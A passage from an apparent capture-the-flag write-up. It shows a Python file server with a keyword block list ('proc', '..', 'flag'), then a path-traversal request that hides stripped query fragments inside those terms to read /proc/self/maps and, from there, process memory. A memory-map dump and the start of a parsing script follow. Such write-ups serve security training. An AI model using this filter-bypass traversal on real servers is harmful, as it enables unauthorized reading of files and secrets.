class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> fcntl</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> mmap</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span 
class="string">'flag.txt'</span>, <span class="string">'rb'</span>) <span class="keyword">as</span> f:</span><br><span class="line"> flag = f.read()</span><br><span class="line">mm = mmap.mmap(-<span class="number">1</span>, <span class="built_in">len</span>(flag))</span><br><span class="line">mm.write(flag)</span><br><span class="line">os.remove(<span class="string">'flag.txt'</span>)</span><br><span class="line"></span><br><span class="line">FORBIDDEN = [<span class="string">b'flag'</span>, <span class="string">b'proc'</span>, <span class="string">b'<'</span>, <span class="string">b'>'</span>, <span class="string">b'^'</span>, <span class="string">b"'"</span>, <span class="string">b'"'</span>, <span class="string">b'..'</span>, <span class="string">b'./'</span>]</span><br><span class="line">PAGE = <span class="string">"""<!DOCTYPE html></span></span><br><span class="line"><span class="string"><html lang="en"></span></span><br><span class="line"><span class="string"><head></span></span><br><span class="line"><span class="string"> <meta charset="UTF-8"></span></span><br><span class="line"><span class="string"> <meta name="viewport" content="width=device-width, initial-scale=1.0"></span></span><br><span class="line"><span class="string"> <title>Secure Gateway</title></span></span><br><span class="line"><span class="string"> <style></span></span><br><span class="line"><span class="string"> body { font-family: 'Courier New', monospace; background-color: #0c0c0c; color: #00ff00; text-align: center; margin-top: 10%; }</span></span><br><span class="line"><span class="string"> .container { border: 1px solid #00ff00; padding: 2rem; display: inline-block; }</span></span><br><span class="line"><span class="string"> h1 { font-size: 2.5rem; text-shadow: 0 0 5px #00ff00; }</span></span><br><span class="line"><span class="string"> p { font-size: 1.2rem; }</span></span><br><span class="line"><span class="string"> .status { color: #ffff00; }</span></span><br><span 
class="line"><span class="string"> </style></span></span><br><span class="line"><span class="string"></head></span></span><br><span class="line"><span class="string"><body></span></span><br><span class="line"><span class="string"> <div class="container"></span></span><br><span class="line"><span class="string"> <h1>Firewall</h1></span></span><br><span class="line"><span class="string"> <p class="status">STATUS: All systems operational.</p></span></span><br><span class="line"><span class="string"> <p>Your connection has been inspected.</p></span></span><br><span class="line"><span class="string"> </div></span></span><br><span class="line"><span class="string"></body></span></span><br><span class="line"><span class="string"></html>"""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">handle_connection</span>(<span class="params">conn, addr, log, factor=<span class="number">1</span></span>):</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> conn.settimeout(<span class="number">10.0</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> log:</span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">'log.txt'</span>, <span class="string">'a'</span>) <span class="keyword">as</span> f:</span><br><span class="line"> fcntl.flock(f, fcntl.LOCK_EX)</span><br><span class="line"> log_bytes = <span class="string">f"<span class="subst">{addr[<span class="number">0</span>]}</span>:<span class="subst">{<span class="built_in">str</span>(addr[<span class="number">1</span>])}</span>:<span class="subst">{<span class="built_in">str</span>(conn)}</span>"</span>.encode()</span><br><span class="line"> <span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(factor):</span><br><span class="line"> log_bytes = 
hashlib.sha3_256(log_bytes).digest()</span><br><span class="line"> log_entry = log_bytes.<span class="built_in">hex</span>() + <span class="string">"\n"</span></span><br><span class="line"> f.write(log_entry)</span><br><span class="line"> </span><br><span class="line"> request_data = conn.recv(<span class="number">256</span>)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> request_data.startswith(<span class="string">b"GET /"</span>):</span><br><span class="line"> response = <span class="string">b"HTTP/1.1 400 Bad Request\r\n\r\nInvalid Request"</span></span><br><span class="line"> conn.sendall(response)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> path = request_data.split(<span class="string">b' '</span>)[<span class="number">1</span>]</span><br><span class="line"> pattern = <span class="string">rb'\?offset=(\d+)&length=(\d+)'</span></span><br><span class="line"> </span><br><span class="line"> offset = <span class="number">0</span></span><br><span class="line"> length = -<span class="number">1</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">match</span> = re.search(pattern, path)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">match</span>:</span><br><span class="line"> offset = <span class="built_in">int</span>(<span class="keyword">match</span>.group(<span class="number">1</span>).decode())</span><br><span class="line"> length = <span class="built_in">int</span>(<span class="keyword">match</span>.group(<span class="number">2</span>).decode())</span><br><span class="line"> </span><br><span class="line"> clean_path = re.sub(pattern, <span class="string">b''</span>, path)</span><br><span class="line"> filename = clean_path.strip(<span class="string">b'/'</span>).decode()</span><br><span class="line"> 
<span class="keyword">else</span>:</span><br><span class="line"> filename = path.strip(<span class="string">b'/'</span>).decode()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">except</span> Exception:</span><br><span class="line"> response = <span class="string">b"HTTP/1.1 400 Bad Request\r\n\r\nInvalid Request"</span></span><br><span class="line"> conn.sendall(response)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> filename:</span><br><span class="line"> response_body = PAGE</span><br><span class="line"> response_status = <span class="string">"200 OK"</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(os.path.normpath(filename), <span class="string">'rb'</span>) <span class="keyword">as</span> f:</span><br><span class="line"> <span class="keyword">if</span> offset > <span class="number">0</span>:</span><br><span class="line"> f.seek(offset)</span><br><span class="line"> </span><br><span class="line"> data_bytes = f.read(length)</span><br><span class="line"> response_body = data_bytes.decode(<span class="string">'utf-8'</span>, <span class="string">'ignore'</span>)</span><br><span class="line"> response_status = <span class="string">"200 OK"</span></span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> response_body = <span class="string">f"Invalid path"</span></span><br><span class="line"> response_status = <span class="string">"500 Internal Server Error"</span></span><br><span class="line"></span><br><span class="line"> response = <span class="string">f"HTTP/1.1 <span 
class="subst">{response_status}</span>\r\nContent-Length: <span class="subst">{<span class="built_in">len</span>(response_body)}</span>\r\n\r\n<span class="subst">{response_body}</span>"</span></span><br><span class="line"> conn.sendall(response.encode())</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">except</span> Exception:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"> <span class="keyword">finally</span>:</span><br><span class="line"> conn.close()</span><br><span class="line"> os._exit(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line"> server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line"> server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, <span class="number">1</span>)</span><br><span class="line"> server.bind((<span class="string">'0.0.0.0'</span>, <span class="number">1337</span>))</span><br><span class="line"> server.listen(<span class="number">50</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">f"Server listening on port 1337..."</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> pid, status = os.waitpid(-<span class="number">1</span>, os.WNOHANG)</span><br><span class="line"> <span class="keyword">except</span> ChildProcessError:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"> conn, addr = server.accept()</span><br><span class="line"></span><br><span class="line"> initial_data = conn.recv(<span class="number">256</span>, socket.MSG_PEEK)</span><br><span class="line"> <span class="keyword">if</span> <span 
class="built_in">any</span>(term <span class="keyword">in</span> initial_data.lower() <span class="keyword">for</span> term <span class="keyword">in</span> FORBIDDEN):</span><br><span class="line"> conn.sendall(<span class="string">b"HTTP/1.1 403 Forbidden\r\n\r\nSuspicious request pattern detected."</span>)</span><br><span class="line"> conn.close()</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> initial_data.startswith(<span class="string">b'GET /?log=1'</span>):</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> factor = <span class="number">1</span></span><br><span class="line"> pattern = <span class="string">rb"&factor=(\d+)"</span></span><br><span class="line"> <span class="keyword">match</span> = re.search(pattern, initial_data)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">match</span>:</span><br><span class="line"> factor = <span class="built_in">int</span>(<span class="keyword">match</span>.group(<span class="number">1</span>).decode())</span><br><span class="line"> pid = os.fork()</span><br><span class="line"> <span class="keyword">if</span> pid == <span class="number">0</span>:</span><br><span class="line"> server.close()</span><br><span class="line"> handle_connection(conn, addr, <span class="literal">True</span>, factor)</span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"[ERROR]: "</span>, e)</span><br><span class="line"> <span class="keyword">finally</span>:</span><br><span class="line"> conn.close()</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> pid = os.fork()</span><br><span class="line"> <span 
class="keyword">if</span> pid == <span class="number">0</span>:</span><br><span class="line"> server.close()</span><br><span class="line"> handle_connection(conn, addr, <span class="literal">False</span>)</span><br><span class="line"> </span><br><span class="line"> conn.close()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> main()</span><br></pre></td></tr></table></figure><p>The flag file is deleted right after its contents have been read into memory, so the flag has to be recovered from the process memory, under proc/self/mem.</p><h4 id="非预期"><a href="#非预期" class="headerlink" title="非预期"></a>Unintended solution</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pattern = rb'\?offset=(\d+)&length=(\d+)'</span><br><span class="line"></span><br><span class="line">clean_path = re.sub(pattern, b'', path)</span><br></pre></td></tr></table></figure><p>It merely replaces the invalid content with an empty string.</p><p>So ?offset=(\d+)&length=(\d+) can simply be inserted between the filtered .. and proc of /../proc/self/environ.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GET /.?offset=0&length=100000.?offset=0&length=10000/pr?offset=0&length=100000oc/self/maps HTTP/1.1</span><br><span class="line">Host: hostlocal:17309</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260111203148997.png" alt="image-20260111203148997"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span 
class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span 
class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br></pre></td><td class="code"><pre><span class="line">56395827e000-56395827f000 r--p 00000000 103:00 15523385 /usr/local/bin/python3.12</span><br><span class="line">56395827f000-563958280000 r-xp 00001000 103:00 15523385 /usr/local/bin/python3.12</span><br><span class="line">563958280000-563958281000 r--p 00002000 103:00 15523385 /usr/local/bin/python3.12</span><br><span class="line">563958281000-563958282000 r--p 00002000 103:00 15523385 /usr/local/bin/python3.12</span><br><span class="line">563958282000-563958283000 rw-p 00003000 103:00 15523385 /usr/local/bin/python3.12</span><br><span class="line">563959f5f000-56395a3b0000 rw-p 00000000 00:00 0 [heap]</span><br><span class="line">7fa2fe996000-7fa2fe998000 r--p 00000000 103:00 15524156 /usr/local/lib/python3.12/lib-dynload/mmap.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe998000-7fa2fe99b000 r-xp 00002000 103:00 15524156 /usr/local/lib/python3.12/lib-dynload/mmap.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe99b000-7fa2fe99d000 r--p 00005000 103:00 15524156 
/usr/local/lib/python3.12/lib-dynload/mmap.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe99d000-7fa2fe99e000 r--p 00006000 103:00 15524156 /usr/local/lib/python3.12/lib-dynload/mmap.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe99e000-7fa2fe99f000 rw-p 00007000 103:00 15524156 /usr/local/lib/python3.12/lib-dynload/mmap.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe99f000-7fa2fe9a0000 r--p 00000000 103:00 15524153 /usr/local/lib/python3.12/lib-dynload/fcntl.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9a0000-7fa2fe9a2000 r-xp 00001000 103:00 15524153 /usr/local/lib/python3.12/lib-dynload/fcntl.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9a2000-7fa2fe9a4000 r--p 00003000 103:00 15524153 /usr/local/lib/python3.12/lib-dynload/fcntl.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9a4000-7fa2fe9a5000 r--p 00004000 103:00 15524153 /usr/local/lib/python3.12/lib-dynload/fcntl.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9a5000-7fa2fe9a6000 rw-p 00005000 103:00 15524153 /usr/local/lib/python3.12/lib-dynload/fcntl.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9a6000-7fa2fe9a8000 r--p 00000000 103:00 15524094 /usr/local/lib/python3.12/lib-dynload/_blake2.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9a8000-7fa2fe9af000 r-xp 00002000 103:00 15524094 /usr/local/lib/python3.12/lib-dynload/_blake2.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9af000-7fa2fe9b1000 r--p 00009000 103:00 15524094 /usr/local/lib/python3.12/lib-dynload/_blake2.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9b1000-7fa2fe9b2000 r--p 0000a000 103:00 15524094 /usr/local/lib/python3.12/lib-dynload/_blake2.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9b2000-7fa2fe9b3000 rw-p 0000b000 103:00 15524094 
/usr/local/lib/python3.12/lib-dynload/_blake2.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9b3000-7fa2fe9b8000 r--p 00000000 103:00 15520405 /usr/lib/x86_64-linux-gnu/libzstd.so.1.5.7</span><br><span class="line">7fa2fe9b8000-7fa2fea67000 r-xp 00005000 103:00 15520405 /usr/lib/x86_64-linux-gnu/libzstd.so.1.5.7</span><br><span class="line">7fa2fea67000-7fa2fea7b000 r--p 000b4000 103:00 15520405 /usr/lib/x86_64-linux-gnu/libzstd.so.1.5.7</span><br><span class="line">7fa2fea7b000-7fa2fea7c000 r--p 000c8000 103:00 15520405 /usr/lib/x86_64-linux-gnu/libzstd.so.1.5.7</span><br><span class="line">7fa2fea7c000-7fa2fea7d000 rw-p 000c9000 103:00 15520405 /usr/lib/x86_64-linux-gnu/libzstd.so.1.5.7</span><br><span class="line">7fa2fea7d000-7fa2fea80000 r--p 00000000 103:00 15520403 /usr/lib/x86_64-linux-gnu/libz.so.1.3.1</span><br><span class="line">7fa2fea80000-7fa2fea94000 r-xp 00003000 103:00 15520403 /usr/lib/x86_64-linux-gnu/libz.so.1.3.1</span><br><span class="line">7fa2fea94000-7fa2fea9b000 r--p 00017000 103:00 15520403 /usr/lib/x86_64-linux-gnu/libz.so.1.3.1</span><br><span class="line">7fa2fea9b000-7fa2fea9c000 r--p 0001d000 103:00 15520403 /usr/lib/x86_64-linux-gnu/libz.so.1.3.1</span><br><span class="line">7fa2fea9c000-7fa2fea9d000 rw-p 0001e000 103:00 15520403 /usr/lib/x86_64-linux-gnu/libz.so.1.3.1</span><br><span class="line">7fa2fea9d000-7fa2feb94000 r--p 00000000 103:00 15520163 /usr/lib/x86_64-linux-gnu/libcrypto.so.3</span><br><span class="line">7fa2feb94000-7fa2fef15000 r-xp 000f7000 103:00 15520163 /usr/lib/x86_64-linux-gnu/libcrypto.so.3</span><br><span class="line">7fa2fef15000-7fa2ff04c000 r--p 00478000 103:00 15520163 /usr/lib/x86_64-linux-gnu/libcrypto.so.3</span><br><span class="line">7fa2ff04c000-7fa2ff0cf000 r--p 005ae000 103:00 15520163 /usr/lib/x86_64-linux-gnu/libcrypto.so.3</span><br><span class="line">7fa2ff0cf000-7fa2ff0d2000 rw-p 00631000 103:00 15520163 /usr/lib/x86_64-linux-gnu/libcrypto.so.3</span><br><span 
class="line">7fa2ff0d2000-7fa2ff0d5000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2ff0d5000-7fa2ff0d9000 r--p 00000000 103:00 15524114 /usr/local/lib/python3.12/lib-dynload/_hashlib.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0d9000-7fa2ff0df000 r-xp 00004000 103:00 15524114 /usr/local/lib/python3.12/lib-dynload/_hashlib.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0df000-7fa2ff0e3000 r--p 0000a000 103:00 15524114 /usr/local/lib/python3.12/lib-dynload/_hashlib.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0e3000-7fa2ff0e4000 r--p 0000d000 103:00 15524114 /usr/local/lib/python3.12/lib-dynload/_hashlib.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0e4000-7fa2ff0e6000 rw-p 0000e000 103:00 15524114 /usr/local/lib/python3.12/lib-dynload/_hashlib.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0e6000-7fa2ff0ea000 r--p 00000000 103:00 15524149 /usr/local/lib/python3.12/lib-dynload/array.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0ea000-7fa2ff0f1000 r-xp 00004000 103:00 15524149 /usr/local/lib/python3.12/lib-dynload/array.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0f1000-7fa2ff0f5000 r--p 0000b000 103:00 15524149 /usr/local/lib/python3.12/lib-dynload/array.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0f5000-7fa2ff0f6000 r--p 0000f000 103:00 15524149 /usr/local/lib/python3.12/lib-dynload/array.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0f6000-7fa2ff0f7000 rw-p 00010000 103:00 15524149 /usr/local/lib/python3.12/lib-dynload/array.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0f7000-7fa2ff1f7000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2ff1f7000-7fa2ff1f9000 r--p 00000000 103:00 15524161 /usr/local/lib/python3.12/lib-dynload/select.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff1f9000-7fa2ff1fc000 r-xp 00002000 
103:00 15524161 /usr/local/lib/python3.12/lib-dynload/select.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff1fc000-7fa2ff1fe000 r--p 00005000 103:00 15524161 /usr/local/lib/python3.12/lib-dynload/select.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff1fe000-7fa2ff1ff000 r--p 00006000 103:00 15524161 /usr/local/lib/python3.12/lib-dynload/select.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff1ff000-7fa2ff200000 rw-p 00007000 103:00 15524161 /usr/local/lib/python3.12/lib-dynload/select.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff200000-7fa2ff300000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2ff300000-7fa2ff304000 r--p 00000000 103:00 15524131 /usr/local/lib/python3.12/lib-dynload/_socket.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff304000-7fa2ff30f000 r-xp 00004000 103:00 15524131 /usr/local/lib/python3.12/lib-dynload/_socket.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff30f000-7fa2ff318000 r--p 0000f000 103:00 15524131 /usr/local/lib/python3.12/lib-dynload/_socket.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff318000-7fa2ff319000 r--p 00017000 103:00 15524131 /usr/local/lib/python3.12/lib-dynload/_socket.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff319000-7fa2ff31a000 rw-p 00018000 103:00 15524131 /usr/local/lib/python3.12/lib-dynload/_socket.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff31a000-7fa2ff51a000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2ff51a000-7fa2ff52b000 r--p 00000000 103:00 15520236 /usr/lib/x86_64-linux-gnu/libm.so.6</span><br><span class="line">7fa2ff52b000-7fa2ff5a8000 r-xp 00011000 103:00 15520236 /usr/lib/x86_64-linux-gnu/libm.so.6</span><br><span class="line">7fa2ff5a8000-7fa2ff608000 r--p 0008e000 103:00 15520236 /usr/lib/x86_64-linux-gnu/libm.so.6</span><br><span class="line">7fa2ff608000-7fa2ff609000 r--p 000ed000 103:00 15520236 
/usr/lib/x86_64-linux-gnu/libm.so.6</span><br><span class="line">7fa2ff609000-7fa2ff60a000 rw-p 000ee000 103:00 15520236 /usr/lib/x86_64-linux-gnu/libm.so.6</span><br><span class="line">7fa2ff60a000-7fa2ff632000 r--p 00000000 103:00 15520148 /usr/lib/x86_64-linux-gnu/libc.so.6</span><br><span class="line">7fa2ff632000-7fa2ff797000 r-xp 00028000 103:00 15520148 /usr/lib/x86_64-linux-gnu/libc.so.6</span><br><span class="line">7fa2ff797000-7fa2ff7ed000 r--p 0018d000 103:00 15520148 /usr/lib/x86_64-linux-gnu/libc.so.6</span><br><span class="line">7fa2ff7ed000-7fa2ff7f1000 r--p 001e2000 103:00 15520148 /usr/lib/x86_64-linux-gnu/libc.so.6</span><br><span class="line">7fa2ff7f1000-7fa2ff7f3000 rw-p 001e6000 103:00 15520148 /usr/lib/x86_64-linux-gnu/libc.so.6</span><br><span class="line">7fa2ff7f3000-7fa2ff800000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2ff800000-7fa2ff900000 r--p 00000000 103:00 15523607 /usr/local/lib/libpython3.12.so.1.0</span><br><span class="line">7fa2ff900000-7fa2ffb1f000 r-xp 00100000 103:00 15523607 /usr/local/lib/libpython3.12.so.1.0</span><br><span class="line">7fa2ffb1f000-7fa2ffc6f000 r--p 0031f000 103:00 15523607 /usr/local/lib/libpython3.12.so.1.0</span><br><span class="line">7fa2ffc6f000-7fa2ffce6000 r--p 0046e000 103:00 15523607 /usr/local/lib/libpython3.12.so.1.0</span><br><span class="line">7fa2ffce6000-7fa2ffe55000 rw-p 004e5000 103:00 15523607 /usr/local/lib/libpython3.12.so.1.0</span><br><span class="line">7fa2ffe55000-7fa2ffe56000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2ffe5c000-7fa2ffe5f000 r--p 00000000 103:00 15524155 /usr/local/lib/python3.12/lib-dynload/math.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ffe5f000-7fa2ffe67000 r-xp 00003000 103:00 15524155 /usr/local/lib/python3.12/lib-dynload/math.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ffe67000-7fa2ffe6c000 r--p 0000b000 103:00 15524155 
/usr/local/lib/python3.12/lib-dynload/math.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ffe6c000-7fa2ffe6d000 r--p 0000f000 103:00 15524155 /usr/local/lib/python3.12/lib-dynload/math.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ffe6d000-7fa2ffe6e000 rw-p 00010000 103:00 15524155 /usr/local/lib/python3.12/lib-dynload/math.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ffe6e000-7fa2ffed4000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2ffed4000-7fa2ffedb000 r--s 00000000 103:00 15520059 /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache</span><br><span class="line">7fa2ffedb000-7fa2fff35000 r--p 00000000 103:00 15519696 /usr/lib/locale/C.utf8/LC_CTYPE</span><br><span class="line">7fa2fff35000-7fa2fff37000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2fff38000-7fa2fff39000 rw-s 00000000 00:01 6174 /dev/zero (deleted)</span><br><span class="line">7fa2fff39000-7fa2fff3b000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2fff3b000-7fa2fff3c000 r--p 00000000 103:00 15520122 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2</span><br><span class="line">7fa2fff3c000-7fa2fff64000 r-xp 00001000 103:00 15520122 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2</span><br><span class="line">7fa2fff64000-7fa2fff6f000 r--p 00029000 103:00 15520122 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2</span><br><span class="line">7fa2fff6f000-7fa2fff71000 r--p 00034000 103:00 15520122 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2</span><br><span class="line">7fa2fff71000-7fa2fff72000 rw-p 00036000 103:00 15520122 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2</span><br><span class="line">7fa2fff72000-7fa2fff73000 rw-p 00000000 00:00 0 </span><br><span class="line">7ffe68e9d000-7ffe68ebe000 rw-p 00000000 00:00 0 [stack]</span><br><span class="line">7ffe68ec9000-7ffe68ecd000 r--p 00000000 00:00 0 [vvar]</span><br><span class="line">7ffe68ecd000-7ffe68ecf000 r-xp 00000000 00:00 0 [vdso]</span><br><span 
class="line">ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]</span><br></pre></td></tr></table></figure><p>We do not know the absolute address at which the flag is stored in memory, so we have to look for memory segments that are readable and writable (rw-p) and have no associated file name.</p><p>A script computes the offset and length, converting from hexadecimal to decimal.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">maps = <span class="built_in">open</span>(<span class="string">'maps'</span>)</span><br><span class="line">b = maps.read()</span><br><span class="line">lines = b.split(<span class="string">'\n'</span>)</span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> lines:</span><br><span class="line"> <span class="keyword">if</span> <span class="string">'rw'</span> <span class="keyword">in</span> line:</span><br><span class="line"> addr = re.search(<span 